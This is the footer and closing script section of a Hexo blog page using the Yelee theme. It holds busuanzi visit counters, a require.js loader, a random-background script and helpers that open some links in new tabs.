      <footer id="footer">
    <div class="outer">
        <div id="footer-info">
            <div class="footer-left">
                <i class="fa fa-copyright"></i> 
                2019-2020 HeZhaochen
            </div>
            <div class="footer-right">
                <a href="http://hexo.io/" target="_blank" title="快速、简洁且高效的博客框架">Hexo</a>  Theme <a href="https://github.com/MOxFIVE/hexo-theme-yelee" target="_blank" title="简而不减 Hexo 双栏博客主题  v3.5">Yelee</a> by MOxFIVE <i class="fa fa-heart animated infinite pulse"></i>
            </div>
        </div>
        
            <div class="visit">
                
                    <span id="busuanzi_container_site_pv" style='display:none'>
                        <span id="site-visit" title="本站到访数"><i class="fa fa-user" aria-hidden="true"></i><span id="busuanzi_value_site_uv"></span>
                        </span>
                    </span>
                
                
                    <span>| </span>
                
                
                    <span id="busuanzi_container_page_pv" style='display:none'>
                        <span id="page-visit"  title="本页阅读量"><i class="fa fa-eye animated infinite pulse" aria-hidden="true"></i><span id="busuanzi_value_page_pv"></span>
                        </span>
                    </span>
                
            </div>
        
    </div>
</footer>
    </div>
    
<script data-main="/js/main.js" src="//cdn.bootcss.com/require.js/2.2.0/require.min.js"></script>

    <script>
        $(document).ready(function() {
            var iPad = window.navigator.userAgent.indexOf('iPad');
            if (iPad > -1 || $(".left-col").css("display") === "none") {
                var bgColorList = ["#9db3f4", "#414141", "#e5a859", "#f5dfc6", "#c084a0", "#847e72", "#cd8390", "#996731"];
                var bgColor = Math.ceil(Math.random() * (bgColorList.length - 1));
                $("body").css({"background-color": bgColorList[bgColor], "background-size": "cover"});
            }
            else {
                var backgroundnum = 2;
                var backgroundimg = "url(/background/bg-x.jpg)".replace(/x/gi, Math.ceil(Math.random() * backgroundnum));
                $("body").css({"background": backgroundimg, "background-attachment": "fixed", "background-size": "cover"});
            }
        })
    </script>





<div class="scroll" id="scroll">
    <a href="#" title="返回顶部"><i class="fa fa-arrow-up"></i></a>
    <a href="#comments" onclick="load$hide();" title="查看评论"><i class="fa fa-comments-o"></i></a>
    <a href="#footer" title="转到底部"><i class="fa fa-arrow-down"></i></a>
</div>
<script>
    // Open in New Window
    
        var oOpenInNew = {
            
            
            
            
            
            
             archives: ".archive-article-title", 
             miniArchives: "a.post-list-link", 
            
             friends: "#js-friends a", 
             socail: ".social a" 
        }
        for (var x in oOpenInNew) {
            $(oOpenInNew[x]).attr("target", "_blank");
        }
    
</script>

<script async src="https://dn-lbstatics.qbox.me/busuanzi/2.3/busuanzi.pure.mini.js">
</script>
  </div>
</body>
</html>